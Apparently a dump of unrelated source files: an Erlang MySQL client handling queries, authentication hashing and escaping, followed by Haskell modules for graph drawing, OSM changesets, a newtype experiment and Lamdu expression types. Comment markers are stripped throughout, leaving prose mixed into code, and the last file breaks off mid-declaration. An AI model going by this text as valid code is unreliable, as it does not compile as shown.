io : format("from mysql:~p ~ n",[{mysql , Packet , } ] ) ,
Pid ! {self(), {mysql, Packet, Num}},
sendpacket(Pid, Rest);
true ->
Bin
end;
_ ->
Bin
end.
do_query(Pid, Vsn, Debug, Query) ->
Packet = list_to_binary([?MYSQL_QUERY_OP, Query]),
Pid ! {send, Packet, 0},
Response = get_query_response(Pid, Vsn),
case Response of
{error, Str} ->
io:format("Bad query:~s~nRespnse:~s~n",[Query,Str]);
_ ->
debug(Debug, "Query=~p~nResponse=~p~n",[Query, Response])
end,
Response.
debug(false, _, _) -> void;
debug(true, Format, Data) -> io:format(Format, Data).
get_query_response(Pid, Vsn) ->
<<Fieldcount:8, Rest/binary>> = do_recv(Pid),
case Fieldcount of
0 ->
<<AffectedRows:8, _Rest2/binary>> = Rest,
{updated, AffectedRows};
255 ->
<<_Code:16/little, Message/binary>> = Rest,
{error, binary_to_list(Message)};
_ ->
Tabular data received
Fields = get_fields(Pid, [], Vsn),
Rows = get_rows(Fieldcount, Pid, []),
{data, Fields, Rows}
end.
get_fields(Pid, Res, my_sql_40) ->
Packet = do_recv(Pid),
case Packet of
<<254:8>> ->
reverse(Res);
<<254:8, Rest/binary>> when size(Rest) < 8 ->
reverse(Res);
_ ->
{Table, Rest} = get_with_length(Packet),
{Field, Rest2} = get_with_length(Rest),
{LengthB, Rest3} = get_with_length(Rest2),
LengthL = size(LengthB) * 8,
<<Length:LengthL/little>> = LengthB,
{Type, Rest4} = get_with_length(Rest3),
{_Flags, _Rest5} = get_with_length(Rest4),
Val = {binary_to_list(Table),
binary_to_list(Field),
Length,
TODO : Check on MySQL 4.0 if types are specified
using the same 4.1 formalism and could
binary_to_list(Type)},
get_fields(Pid, [Val|Res], my_sql_40)
end;
get_fields(Pid, Res, my_sql_41) ->
Support for MySQL 4.1.x and 5.x :
Packet = do_recv(Pid),
case Packet of
<<254:8>> ->
reverse(Res);
<<254:8, Rest/binary>> when size(Rest) < 8 ->
reverse(Res);
_ ->
{_Catalog, Rest} = get_with_length(Packet),
{Database, Rest2} = get_with_length(Rest),
{Table, Rest3} = get_with_length(Rest2),
OrgTable is the real table name if Table is an alias
{_OrgTable, Rest4} = get_with_length(Rest3),
{Field, Rest5} = get_with_length(Rest4),
OrgField is the real field name if Field is an alias
{_OrgField, Rest6} = get_with_length(Rest5),
<<_Metadata:8/little, _Charset:16/little,
Length:32/little, Type:8/little,
_Flags:16/little, _Decimals:8/little,
_Rest7/binary>> = Rest6,
This = {binary_to_list(Database),
binary_to_list(Table),
binary_to_list(Field),
Length,
get_field_datatype(Type)},
get_fields(Pid, [This | Res], my_sql_41)
end.
get_rows repeatedly receives rows until end - of - rows ( 254 )
is received . Each row has Nfields entries
get_rows(NFields, Pid, L) ->
Packet = do_recv(Pid),
case Packet of
<<254:8, Rest/binary>> when size(Rest) < 8 ->
reverse(L);
_ ->
Row = get_row(NFields, Packet),
get_rows(NFields, Pid, [Row|L])
end.
get_row(0, _) ->
[];
get_row(N, Data) ->
{Val, Data1} = get_with_length(Data),
[Val|get_row(N-1, Data1)].
get_with_length(<<251:8, B/binary>>) -> {null, B};
get_with_length(<<252:8, Len:16/little, B/binary>>) -> split_binary(B, Len);
get_with_length(<<253:8, Len:24/little, B/binary>>) -> split_binary(B, Len);
get_with_length(<<254:8, Len:64/little, B/binary>>) -> split_binary(B, Len);
get_with_length(<<Len:8, B/binary>>) when Len < 251 -> split_binary(B, Len).
do_auth(Pid , , password ) - > { ok , Version } | { error , Why }
do_auth(Pid, User, Password) ->
receive
{Pid, {mysql, Packet, Seq}} ->
{Version, Salt1, Salt2, Caps} = greeting(Packet),
AuthRes =
case is_secure_connection(Caps) of
true ->
do_new_auth(Pid,Seq+1,User,Password,Salt1,Salt2);
false ->
do_old_auth(Pid,Seq+1,User,Password,Salt1)
end,
case AuthRes of
{ok, <<0:8, _Rest/binary>>, _RecvNum} ->
{ok, Version};
{ok, <<255:8, Code:16/little, Message/binary>>, _RecvNum} ->
io:format("mysql_conn: init error ~p: ~p~n",
[Code, binary_to_list(Message)]),
{error, binary_to_list(Message)};
{ok, RecvPacket, _RecvNum} ->
io:format("mysql_conn: init unknown error ~p~n",
[binary_to_list(RecvPacket)]),
{error, binary_to_list(RecvPacket)};
{error, Reason} ->
io:format("mysql_conn: init failed receiving data : ~p~n",
[Reason]),
{error, Reason}
end;
{error, Reason} ->
{error, Reason}
end.
do_old_auth(Pid, Seq, User, Password, Salt1) ->
Auth = password_old(Password, Salt1),
Packet2 = make_auth(User, Auth),
send_mysql(Pid, Packet2, Seq),
do_recv(Pid, Seq).
do_new_auth(Pid, Seq, User, Password, Salt1, Salt2) ->
Auth = password_new(Password, Salt1 ++ Salt2),
Packet2 = make_new_auth(User, Auth, none),
send_mysql(Pid, Packet2, Seq),
receive
{Pid, {mysql, Packet3, Seq1}} ->
case Packet3 of
<<254:8>> ->
AuthOld = password_old(Password, Salt1),
send_mysql(Pid, <<AuthOld/binary, 0:8>>, Seq1 + 1),
do_recv(Pid, Seq);
_ ->
{ok, Packet3, Seq1}
end;
Other ->
{error, {oops, Pid, Other}}
end.
password_new(Pwd, Salt) ->
Hash1 = elib1_sha1:binstring(Pwd),
Hash2 = elib1_sha1:binstring(binary_to_list(Hash1)),
Res = elib1_sha1:binstring(Salt ++ binary_to_list(Hash2)),
bxor_binary(Res, Hash1).
password_old(Password, Salt) ->
{P1, P2} = hash(Password),
{S1, S2} = hash(Salt),
Seed1 = P1 bxor S1,
Seed2 = P2 bxor S2,
List = rnd(9, Seed1, Seed2),
{L, [Extra]} = lists:split(8, List),
list_to_binary(lists:map(fun (E) ->
E bxor (Extra - 64)
end, L)).
make_auth(User, Password) ->
Caps = ?LONG_PASSWORD bor ?LONG_FLAG
bor ?TRANSACTIONS bor ?FOUND_ROWS,
Maxsize = 0,
UserB = list_to_binary(User),
PasswordB = Password,
<<Caps:16/little, Maxsize:24/little, UserB/binary, 0:8,
PasswordB/binary>>.
make_new_auth(User, Password, Database) ->
DBCaps = case Database of
none ->
0;
_ ->
?CONNECT_WITH_DB
end,
Caps = ?LONG_PASSWORD bor ?LONG_FLAG bor ?TRANSACTIONS bor
?PROTOCOL_41 bor ?SECURE_CONNECTION bor DBCaps
bor ?FOUND_ROWS,
Maxsize = ?MAX_PACKET_SIZE,
UserB = list_to_binary(User),
PasswordL = size(Password),
DatabaseB = case Database of
none ->
<<>>;
_ ->
list_to_binary(Database)
end,
<<Caps:32/little, Maxsize:32/little, 8:8, 0:23/integer-unit:8,
UserB/binary, 0:8, PasswordL:8, Password/binary, DatabaseB/binary>>.
hash(S) ->
hash(S, 1345345333, 305419889, 7).
hash([C | S], N1, N2, Add) ->
N1_1 = N1 bxor (((N1 band 63) + Add) * C + N1 * 256),
N2_1 = N2 + ((N2 * 256) bxor N1_1),
Add_1 = Add + C,
hash(S, N1_1, N2_1, Add_1);
hash([], N1, N2, _Add) ->
Mask = (1 bsl 31) - 1,
{N1 band Mask , N2 band Mask}.
greeting(Packet) ->
<<_Protocol:8, Rest/binary>> = Packet,
{Version, Rest2} = asciz(Rest),
<<_TreadID:32/little, Rest3/binary>> = Rest2,
{Salt, Rest4} = asciz(Rest3),
<<Caps:16/little, Rest5/binary>> = Rest4,
<<_ServerChar:16/binary-unit:8, Rest6/binary>> = Rest5,
{Salt2, _Rest7} = asciz(Rest6),
[ Version , Protocol , Salt , Caps , ServerChar , Salt2 ] ) ,
{normalize_version(Version), Salt, Salt2, Caps}.
normalize_version([$4,$.,$0|_T]) ->
io:format("Switching to MySQL 4.0.x protocol.~n"),
my_sql_40;
normalize_version([$4,$.,$1|_T]) ->
my_sql_41;
normalize_version([$5|_T]) ->
MySQL version 5.x protocol is compliant with MySQL 4.1.x :
my_sql_41;
normalize_version(Other) ->
io:format("MySQL version not supported: ~p "
"MySQL Erlang module might not work correctly.~n", [Other]),
my_sql_40.
asciz(Data) when is_list(Data) -> asciz_list(Data, []);
asciz(Data) when is_binary(Data) -> asciz_binary(Data, []).
asciz_list([], L) -> {reverse(L), []};
asciz_list([0|T], L) -> {reverse(L), T};
asciz_list([H|T], L) -> asciz_list(T, [H|L]).
asciz_binary(<<>>, Acc) -> {reverse(Acc), <<>>};
asciz_binary(<<0:8, Rest/binary>>, Acc) -> {reverse(Acc), Rest};
asciz_binary(<<C:8, Rest/binary>>, Acc) -> asciz_binary(Rest, [C|Acc]).
rnd(N, Seed1, Seed2) ->
Mod = (1 bsl 30) - 1,
rnd(N, [], Seed1 rem Mod, Seed2 rem Mod).
rnd(0, List, _, _) ->
reverse(List);
rnd(N, List, Seed1, Seed2) ->
Mod = (1 bsl 30) - 1,
NSeed1 = (Seed1 * 3 + Seed2) rem Mod,
NSeed2 = (NSeed1 + Seed2 + 33) rem Mod,
Float = (float(NSeed1) / float(Mod))*31,
Val = trunc(Float)+64,
rnd(N-1, [Val|List], NSeed1, NSeed2).
bxor_binary(B1, B2) ->
list_to_binary(zipwith(fun (E1, E2) -> E1 bxor E2 end,
binary_to_list(B1), binary_to_list(B2))).
send_mysql(Pid, Packet, Seq) when is_binary(Packet),
is_integer(Seq) ->
Pid ! {send, Packet, Seq}.
get_field_datatype(0) -> 'DECIMAL';
get_field_datatype(1) -> 'TINY';
get_field_datatype(2) -> 'SHORT';
get_field_datatype(3) -> 'LONG';
get_field_datatype(4) -> 'FLOAT';
get_field_datatype(5) -> 'DOUBLE';
get_field_datatype(6) -> 'NULL';
get_field_datatype(7) -> 'TIMESTAMP';
get_field_datatype(8) -> 'LONGLONG';
get_field_datatype(9) -> 'INT24';
get_field_datatype(10) -> 'DATE';
get_field_datatype(11) -> 'TIME';
get_field_datatype(12) -> 'DATETIME';
get_field_datatype(13) -> 'YEAR';
get_field_datatype(14) -> 'NEWDATE';
get_field_datatype(16) -> 'BIT';
get_field_datatype(246) -> 'DECIMAL';
get_field_datatype(247) -> 'ENUM';
get_field_datatype(248) -> 'SET';
get_field_datatype(249) -> 'TINYBLOB';
get_field_datatype(250) -> 'MEDIUM_BLOG';
get_field_datatype(251) -> 'LONG_BLOG';
get_field_datatype(252) -> 'BLOB';
get_field_datatype(253) -> 'VAR_STRING';
get_field_datatype(254) -> 'STRING';
get_field_datatype(255) -> 'GEOMETRY'.
is_secure_connection(Caps) ->
case Caps band ?SECURE_CONNECTION of
?SECURE_CONNECTION -> true;
_ -> false
end.
do_recv(Pid) ->
receive
{Pid, {mysql, Packet, _Seq}} ->
Packet
end.
do_recv(Pid, Seq) ->
receive
{Pid, {mysql, Packet, Seq}} ->
{Packet, Seq};
{Pid, Other} ->
io:format("unexpected data:~p ~n",[Other]),
exit(1)
end.
quote(X) when is_list(X) -> [$"|reverse([$"|quote(X, [])])];
quote(X) when is_binary(X) -> quote(binary_to_list(X));
quote(X) when is_atom(X) -> quote(atom_to_list(X)).
quote([], L) -> L;
quote([0|T], L) -> quote(T, [$0, $\\|L]);
quote([10|T], L) -> quote(T, [$n, $\\|L]);
quote([13|T], L) -> quote(T, [$r, $\\|L]);
quote([$\\|T], L) -> quote(T, [$\\, $\\|L]);
quote([$'|T], L) -> quote(T, [$', $\\|L]);
quote([$"|T], L) -> quote(T, [$", $\\|L]);
quote([26|T], L) -> quote(T, [$Z, $\\|L]);
quote([H|T], L) -> quote(T, [H|L]).
|
45e606d79ea98eb28961f260b2865ff916dcd48b5f810dd6a2be479baac60299 | tuura/graph-visualisation | Visualise.hs | -----------------------------------------------------------------------------
-- |
-- Module: Visualise
-- Description : Provides a series of functions for drawing algebraic graphs.
Copyright : ( c ) 2018
--
Provides two graph drawing functions - ' drawGraph ' and ' drawGraph '' - that
-- can invoke various graph drawing functions depending on their 'Method' parameter.
-- 'drawGraph' draws a graph with default settings whereas 'drawGraph'' can be
-- provided with a 'Settings' parameter. The graph to be drawn is an instance
-- of the type graph as defined by "Algebra.Graph".
--
The five graph drawing ' Method 's defined for ' Method ' can be used for both
drawing functions , apart from ' ExpressionTree ' which can only be used for
-- 'drawGraph' not 'drawGraph'' due to its advanced parameters. Therefore
-- 'drawExpressionTree' and 'drawExpressionTree'' are reexported from
" Visualise . ExpressionTree " .
--
-- To draw a graph using "Data.GraphViz" the function 'drawWithGraphViz' from
" Visualise . GraphViz " can be used .
--
-----------------------------------------------------------------------------
module Visualise (
-- * The constructors for the graph-drawing methods.
Method(..),
* The type used to represent the dimensions of an output < Diagram > , a tuple of Maybe Doubles .
Dimensions,
* The two main graph drawing functions .
drawGraph, drawGraph',
* The function for drawing with GraphViz , reexported from " Visualise . GraphViz " .
drawWithGraphViz,
* The functions for drawing an expression tree from a graph reexported from " Visualise . ExpressionTree " .
-- 'drawExpressionTree' can be used with 'drawGraph' and the 'Method' constructor but 'drawExpressionTree'' can't as it requires extra parameters.
drawExpressionTree, drawExpressionTree',
* Saves a < Diagram > to to a specified SVG file with the specified ' ' .
saveSVG
) where
import Visualise.Common
import Visualise.Tree
import Visualise.FlatCircle
import Visualise.Hierarchical
import Visualise.FlatAdaptive
import Visualise.GraphViz
import Visualise.ExpressionTree
import Algebra.Graph
import Diagrams.Prelude hiding (Empty)
import Diagrams.Backend.SVG
import Data.GraphViz.Commands
-- | The graph drawing method
^ The ' drawTree ' function from " Visualise . Tree " module will be used to draw the graph .
^ The ' drawTreePartialOrder ' function " Visualise . Tree " module will be used to draw the graph , with all indirect dependencies removed by using the - Graham algorithm .
^ The " Visualise . FlatCircle " module will be used to draw the graph , with the verticies being placed on the vertecies of a regular polygon of n sides ( where n is the number of graph vertices ) .
^ The " Visualise . Hierarchical " module will be used to draw the graph as a hierarchical graph by grouping together vertices and groups of vertices with common connections .
^ The " Visualise . FlatAdaptive " module will be used to draw the graph , with the layout of vertices being dynamic depending on the connections between them .
^ The " Visualise . ExpressionTree " module will be used to draw an expression tree representation of the graph .
| The ' Dimensions ' data type is used to store the dimensions for writing a < Diagram > to a file . Either the width or height ( or both ) can be provided in a maybe tuple in the order ( Width , ) .
type Dimensions = (Maybe Double, Maybe Double)
-- | Draw a graph using the specified 'Method', uses the default 'Settings' for the specified drawing 'Method'.
To draw a graph using " Visualise . GraphViz " or " Visualise . ExpressionTree " , their own drawing functions must be used : for " Visualise . GraphViz " the function ' drawWithGraphViz ' and for " Visualise . ExpressionTree " the function ' drawExpressionTree ' or ' drawExpressionTree '' .
drawGraph :: (Show a, Eq a, Countable a) => Method -> Graph a -> Diagram B
drawGraph Tree = drawTree
drawGraph TreePartialOrder = drawTreePartialOrder
drawGraph Circle = drawFlatCircle
drawGraph Hierarchical = drawHier
drawGraph Adaptive = drawFlatAdaptive
drawGraph ExpressionTree = drawExpressionTree
-- | Draw a graph using the specified 'Method' and 'Settings'.
Using Lens setters the default ' Settings ' for each graph - drawing method can be customised like so :
--
-- @
ghci > g = Connect ( Vertex 1 ) ( Vertex 2 ) : : Graph Int
ghci > s = ( defaultTreeSettings g ) & directed .~ Undirected
-- ghci> d = drawGraph' Tree s g
ghci > saveSVG test_drawing.svg ( Just 1000 , Nothing ) d
-- @
--
This creates a graph of integer vertices , creates a ' Settings ' instance from the default tree drawing ' Settings ' but modifies the ' _ directed ' field using the Lens setter function to make the graph undirected .
-- Then this 'drawGraph'' function is used to draw the graph using the settings, which is then output to an svg file using the function 'saveSVG'.
drawGraph' :: (Show a, Eq a, Countable a) => Method -> Settings a -> Graph a -> Diagram B
drawGraph' Tree = drawTree'
drawGraph' TreePartialOrder = drawTreePartialOrder'
drawGraph' Circle = drawFlatCircle'
drawGraph' Hierarchical = drawHier'
drawGraph' Adaptive = drawFlatAdaptive'
| Saves a diagram to an SVG file at the specified ' FilePath ' , with the specified ' ' . Only one dimension is needed , they are given in the format :
-- @
-- (Maybe Double, Maybe Double)
-- @
saveSVG :: FilePath -> Dimensions -> Diagram B -> IO ()
saveSVG path (w,h) d = renderSVG path (mkSizeSpec2D w h) d | null | https://raw.githubusercontent.com/tuura/graph-visualisation/5609ec225de197d25283e15057a7bcdfbfc280bb/src/Visualise.hs | haskell | ---------------------------------------------------------------------------
|
Module: Visualise
Description : Provides a series of functions for drawing algebraic graphs.
can invoke various graph drawing functions depending on their 'Method' parameter.
'drawGraph' draws a graph with default settings whereas 'drawGraph'' can be
provided with a 'Settings' parameter. The graph to be drawn is an instance
of the type graph as defined by "Algebra.Graph".
'drawGraph' not 'drawGraph'' due to its advanced parameters. Therefore
'drawExpressionTree' and 'drawExpressionTree'' are reexported from
To draw a graph using "Data.GraphViz" the function 'drawWithGraphViz' from
---------------------------------------------------------------------------
* The constructors for the graph-drawing methods.
'drawExpressionTree' can be used with 'drawGraph' and the 'Method' constructor but 'drawExpressionTree'' can't as it requires extra parameters.
| The graph drawing method
| Draw a graph using the specified 'Method', uses the default 'Settings' for the specified drawing 'Method'.
| Draw a graph using the specified 'Method' and 'Settings'.
@
ghci> d = drawGraph' Tree s g
@
Then this 'drawGraph'' function is used to draw the graph using the settings, which is then output to an svg file using the function 'saveSVG'.
@
(Maybe Double, Maybe Double)
@ | Copyright : ( c ) 2018
Provides two graph drawing functions - ' drawGraph ' and ' drawGraph '' - that
The five graph drawing ' Method 's defined for ' Method ' can be used for both
drawing functions , apart from ' ExpressionTree ' which can only be used for
" Visualise . ExpressionTree " .
" Visualise . GraphViz " can be used .
module Visualise (
Method(..),
* The type used to represent the dimensions of an output < Diagram > , a tuple of Maybe Doubles .
Dimensions,
* The two main graph drawing functions .
drawGraph, drawGraph',
* The function for drawing with GraphViz , reexported from " Visualise . GraphViz " .
drawWithGraphViz,
* The functions for drawing an expression tree from a graph reexported from " Visualise . ExpressionTree " .
drawExpressionTree, drawExpressionTree',
* Saves a < Diagram > to to a specified SVG file with the specified ' ' .
saveSVG
) where
import Visualise.Common
import Visualise.Tree
import Visualise.FlatCircle
import Visualise.Hierarchical
import Visualise.FlatAdaptive
import Visualise.GraphViz
import Visualise.ExpressionTree
import Algebra.Graph
import Diagrams.Prelude hiding (Empty)
import Diagrams.Backend.SVG
import Data.GraphViz.Commands
^ The ' drawTree ' function from " Visualise . Tree " module will be used to draw the graph .
^ The ' drawTreePartialOrder ' function " Visualise . Tree " module will be used to draw the graph , with all indirect dependencies removed by using the - Graham algorithm .
^ The " Visualise . FlatCircle " module will be used to draw the graph , with the verticies being placed on the vertecies of a regular polygon of n sides ( where n is the number of graph vertices ) .
^ The " Visualise . Hierarchical " module will be used to draw the graph as a hierarchical graph by grouping together vertices and groups of vertices with common connections .
^ The " Visualise . FlatAdaptive " module will be used to draw the graph , with the layout of vertices being dynamic depending on the connections between them .
^ The " Visualise . ExpressionTree " module will be used to draw an expression tree representation of the graph .
| The ' Dimensions ' data type is used to store the dimensions for writing a < Diagram > to a file . Either the width or height ( or both ) can be provided in a maybe tuple in the order ( Width , ) .
type Dimensions = (Maybe Double, Maybe Double)
To draw a graph using " Visualise . GraphViz " or " Visualise . ExpressionTree " , their own drawing functions must be used : for " Visualise . GraphViz " the function ' drawWithGraphViz ' and for " Visualise . ExpressionTree " the function ' drawExpressionTree ' or ' drawExpressionTree '' .
drawGraph :: (Show a, Eq a, Countable a) => Method -> Graph a -> Diagram B
drawGraph Tree = drawTree
drawGraph TreePartialOrder = drawTreePartialOrder
drawGraph Circle = drawFlatCircle
drawGraph Hierarchical = drawHier
drawGraph Adaptive = drawFlatAdaptive
drawGraph ExpressionTree = drawExpressionTree
Using Lens setters the default ' Settings ' for each graph - drawing method can be customised like so :
ghci > g = Connect ( Vertex 1 ) ( Vertex 2 ) : : Graph Int
ghci > s = ( defaultTreeSettings g ) & directed .~ Undirected
ghci > saveSVG test_drawing.svg ( Just 1000 , Nothing ) d
This creates a graph of integer vertices , creates a ' Settings ' instance from the default tree drawing ' Settings ' but modifies the ' _ directed ' field using the Lens setter function to make the graph undirected .
drawGraph' :: (Show a, Eq a, Countable a) => Method -> Settings a -> Graph a -> Diagram B
drawGraph' Tree = drawTree'
drawGraph' TreePartialOrder = drawTreePartialOrder'
drawGraph' Circle = drawFlatCircle'
drawGraph' Hierarchical = drawHier'
drawGraph' Adaptive = drawFlatAdaptive'
| Saves a diagram to an SVG file at the specified ' FilePath ' , with the specified ' ' . Only one dimension is needed , they are given in the format :
saveSVG :: FilePath -> Dimensions -> Diagram B -> IO ()
saveSVG path (w,h) d = renderSVG path (mkSizeSpec2D w h) d |
992e4f758bce263d5a5f09394e5fd39af556ab2628515549029f6afe53df6037 | mokus0/junkbox | NewtypeInlining.hs | module NewtypeInlining where
import Unsafe.Coerce
newtype Foo a = Foo a deriving (Eq, Show)
data FunctOr a
= Nil
| Cons a (FunctOr a)
| WhoKnows a [Either a (FunctOr [a])]
deriving (Eq, Show)
instance Functor FunctOr where
fmap f Nil = Nil
fmap f (Cons a b) = Cons (f a) (fmap f b)
fmap f (WhoKnows a b) = WhoKnows (f a) (map (either (Left . f) (Right . fmap (map f))) b)
foo :: FunctOr a -> FunctOr (Foo a)
foo = fmap Foo
unFoo :: FunctOr (Foo a) -> FunctOr a
unFoo = fmap (\(Foo a) -> a)
equivalent to foo , by identical representation of ( a ) ~ a
bar :: FunctOr a -> FunctOr (Foo a)
bar = unsafeCoerce
unBar :: FunctOr (Foo a) -> FunctOr a
unBar = unsafeCoerce
equivalent to i d ( once types are erased ; before that )
eep :: a -> Foo a
eep = Foo
-- question - does foo automatically become bar when compiling?
-- what about unFoo? eep? | null | https://raw.githubusercontent.com/mokus0/junkbox/151014bbef9db2b9205209df66c418d6d58b0d9e/Haskell/TypeExperiments/NewtypeInlining.hs | haskell | question - does foo automatically become bar when compiling?
what about unFoo? eep? | module NewtypeInlining where
import Unsafe.Coerce
newtype Foo a = Foo a deriving (Eq, Show)
data FunctOr a
= Nil
| Cons a (FunctOr a)
| WhoKnows a [Either a (FunctOr [a])]
deriving (Eq, Show)
instance Functor FunctOr where
fmap f Nil = Nil
fmap f (Cons a b) = Cons (f a) (fmap f b)
fmap f (WhoKnows a b) = WhoKnows (f a) (map (either (Left . f) (Right . fmap (map f))) b)
foo :: FunctOr a -> FunctOr (Foo a)
foo = fmap Foo
unFoo :: FunctOr (Foo a) -> FunctOr a
unFoo = fmap (\(Foo a) -> a)
equivalent to foo , by identical representation of ( a ) ~ a
bar :: FunctOr a -> FunctOr (Foo a)
bar = unsafeCoerce
unBar :: FunctOr (Foo a) -> FunctOr a
unBar = unsafeCoerce
equivalent to i d ( once types are erased ; before that )
eep :: a -> Foo a
eep = Foo
|
c25b3ab30e753fbced3e29d500025e879ae7157f12d67f11500555c54efbd9fb | tonymorris/geo-osm | Changeset.hs | # LANGUAGE FlexibleInstances , MultiParamTypeClasses #
| The @changeset@ element of a OSM file .
module Data.Geo.OSM.Changeset
(
Changeset
, changeset
) where
import Text.XML.HXT.Arrow.Pickle
import Data.Geo.OSM.Tag
import Data.Geo.OSM.Lens.TagsL
import Control.Lens.Lens
import Control.Newtype
| The @changeset@ element of a OSM file .
newtype Changeset =
Changeset [Tag]
deriving Eq
-- | Constructs a @changeset@ with tags.
changeset ::
[Tag] -- ^ The list of tags (@tag@ elements).
-> Changeset
changeset =
Changeset
instance XmlPickler Changeset where
xpickle =
xpElem "changeset" (xpWrap (changeset, \(Changeset r) -> r) (xpList xpickle))
instance Show Changeset where
show =
showPickled []
instance TagsL Changeset where
tagsL =
lens unpack (const pack)
instance Newtype Changeset [Tag] where
pack =
Changeset
unpack (Changeset x) =
x
| null | https://raw.githubusercontent.com/tonymorris/geo-osm/776542be2fd30a05f0f9e867128eca5ad5d66bec/src/Data/Geo/OSM/Changeset.hs | haskell | | Constructs a @changeset@ with tags.
^ The list of tags (@tag@ elements). | # LANGUAGE FlexibleInstances , MultiParamTypeClasses #
| The @changeset@ element of a OSM file .
module Data.Geo.OSM.Changeset
(
Changeset
, changeset
) where
import Text.XML.HXT.Arrow.Pickle
import Data.Geo.OSM.Tag
import Data.Geo.OSM.Lens.TagsL
import Control.Lens.Lens
import Control.Newtype
| The @changeset@ element of a OSM file .
newtype Changeset =
Changeset [Tag]
deriving Eq
changeset ::
-> Changeset
changeset =
Changeset
instance XmlPickler Changeset where
xpickle =
xpElem "changeset" (xpWrap (changeset, \(Changeset r) -> r) (xpList xpickle))
instance Show Changeset where
show =
showPickled []
instance TagsL Changeset where
tagsL =
lens unpack (const pack)
instance Newtype Changeset [Tag] where
pack =
Changeset
unpack (Changeset x) =
x
|
29078c5b27031c1e2de98abb859b0c81017d1d06c159423198ee6cfd4b97d602 | lamdu/lamdu | Expression.hs | # LANGUAGE TemplateHaskell , TypeFamilies , MultiParamTypeClasses , UndecidableInstances , DataKinds , GADTs , ConstraintKinds , FlexibleInstances #
module Lamdu.Sugar.Types.Expression
( Expr, Body
, Term(..)
, _BodyLam, _BodyLabeledApply, _BodySimpleApply
, _BodyRecord, _BodyFragment, _BodyLeaf, _BodyNullaryInject
, _BodyToNom, _BodyIfElse, _BodyPostfixApply, _BodyPostfixFunc
, Leaf(..), _LeafLiteral, _LeafHole, _LeafGetVar, _LeafInject
, AnnotatedArg(..), aaTag, aaExpr
, OperatorArgs(..), oaLhs, oaRhs, oaSwapArguments
, LabeledApply(..), aFunc, aMOpArgs, aAnnotatedArgs, aPunnedArgs
, PostfixApply(..), pArg, pFunc
, PostfixFunc(..), _PfCase, _PfFromNom, _PfGetField
, App(..), appFunc, appArg
, Lambda(..), lamFunc, lamLightweight, lamApplyLimit
, Nominal(..), nTId, nVal
-- Binders
, Let(..), lValue, lNames, lBody
, Meta.DefinitionState(..)
, BinderParamScopeId(..), bParamScopeId
, Binder(..), bBody, bAddOuterLet
, BinderBody(..), _BinderLet, _BinderTerm
, Function(..), fChosenScopeProp, fParams, fBody, fBodyScopes
, AssignPlain(..), apAddFirstParam, apBody
, Assignment(..), _BodyFunction, _BodyPlain
-- Holes
, Hole(..), holeOptions, holeTagSuffixes
, HoleOpt(..), _HoleBinder, _HoleVarsRecord
, Query(..), qLangInfo, qSearchTerm
, QueryLangInfo(..), qLangId, qLangDir, qCodeTexts, qUITexts, qNameTexts
, hasQueryLangInfo
-- Fragments
, Fragment(..), fExpr, fHeal, fTypeMismatch, fOptions, fOptApply, fTagSuffixes
, FragOpt(..), _FragPostfix, _FragInject, _FragApplyFunc, _FragOp
, FragOperator(..), oFunc, oRightArg, oAnnotatedArgs
-- If/else
, IfElse(..), iIf, iThen, iElse
, Else(..), _SimpleElse, _ElseIf
, ElseIfBody(..), eAddLet, eIfElse
-- Record & Cases
, Composite(..), cList, cPunnedItems, cTail
, CompositeTail(..), _OpenCompositeTail, _ClosedCompositeTail
, PunnedVar(..), pvVar, pvTagEntityId
, MorphWitness(..)
) where
import qualified Control.Lens as Lens
import Data.Property (Property)
import Data.Kind (Type)
import Hyper
import Hyper.Syntax (App(..), appFunc, appArg)
import Lamdu.Data.Anchors (BinderParamScopeId(..), bParamScopeId)
import qualified Lamdu.Data.Meta as Meta
import Lamdu.Sugar.Internal.EntityId (EntityId)
import Lamdu.Sugar.Types.Eval (ParamScopes)
import Lamdu.Sugar.Types.GetVar (GetVar)
import Lamdu.Sugar.Types.Lhs (LhsNames)
import Lamdu.Sugar.Types.Parts
import Lamdu.Sugar.Types.Tag
import Lamdu.Sugar.Types.TaggedList (TaggedList)
import Lamdu.Sugar.Types.Type (TId)
import qualified Lamdu.Sugar.Types.Type as T
import Lamdu.Prelude
type Body e v name (i :: Type -> Type) o = e v name i o # Annotated (Payload v o)
data AnnotatedArg v name i o k = AnnotatedArg
{ _aaTag :: Tag name
, _aaExpr :: k :# Term v name i o
} deriving Generic
data OperatorArgs v name i o k = OperatorArgs
{ _oaLhs :: k :# Term v name i o
, _oaRhs :: k :# Term v name i o
, _oaSwapArguments :: o Bool -- Returns whether fragment were added or removed
} deriving Generic
-- TODO: func + specialArgs into a single sum type so that field order
matches order , no need for special traversal code
data LabeledApply v name i o k = LabeledApply
{ _aFunc :: k :# Const (GetVar name o)
, _aMOpArgs :: Maybe (OperatorArgs v name i o k)
, _aAnnotatedArgs :: [AnnotatedArg v name i o k]
, _aPunnedArgs :: [PunnedVar name o k]
} deriving Generic
data PostfixApply v name i o k = PostfixApply
{ _pArg :: k :# Term v name i o
, _pFunc :: k :# PostfixFunc v name i o
} deriving Generic
data Lambda v name i o f = Lambda
{ _lamLightweight :: Bool
, _lamApplyLimit :: FuncApplyLimit
, _lamFunc :: Function v name i o f
} deriving Generic
-- | An expression marked for transformation.
-- Holds an expression to be transformed but acts like a hole.
data Fragment v name i o k = Fragment
{ _fExpr :: k :# Term v name i o
, _fHeal :: o EntityId
, _fTypeMismatch :: Maybe (Annotated EntityId # T.Type name)
, _fOptions :: i (Query -> i [Option FragOpt name i o])
, _fOptApply :: i (Option FragOpt name i o)
-- An option to apply (with a hole).
Used for the actions to turn this hole into literal ( i.e pressing " 5 " )
, _fTagSuffixes :: TagSuffixes -- See comment for holeTagSuffixes
} deriving Generic
data FragOpt v name i o k
= FragPostfix [k :# PostfixFunc v name i o] -- a single option can suggest chaining of multiple post-fix applications
| FragInject (TagRef name i o)
| FragWrapInRec (TagRef name i o)
| FragApplyFunc (GetVar name o)
| FragOp (FragOperator v name i o k)
| FragToNom (TId name)
| FragLam
| FragDefer
| FragIf (k :# Term v name i o)
| FragArgument (HoleOpt v name i o k) -- Apply fragmented expr with argument
deriving Generic
data FragOperator v name i o k = FragOperator
{ _oFunc :: k :# Const (GetVar name o)
Argument on right - hand - side ( LTR ) of operator .
-- (usually a hole, but may be completed to other values)
_oRightArg :: k :# Term v name i o
, _oAnnotatedArgs :: [Tag name]
} deriving Generic
data Hole name i o = Hole
{ _holeOptions ::
i (Query -> i [Option HoleOpt name i o])
Inner ` i ` serves two purposes :
-- Name walk requires monadic place to process names.
-- Hole can prepare results depending on the query and avoid doing work
-- if the query filters it out.
, _holeTagSuffixes :: TagSuffixes
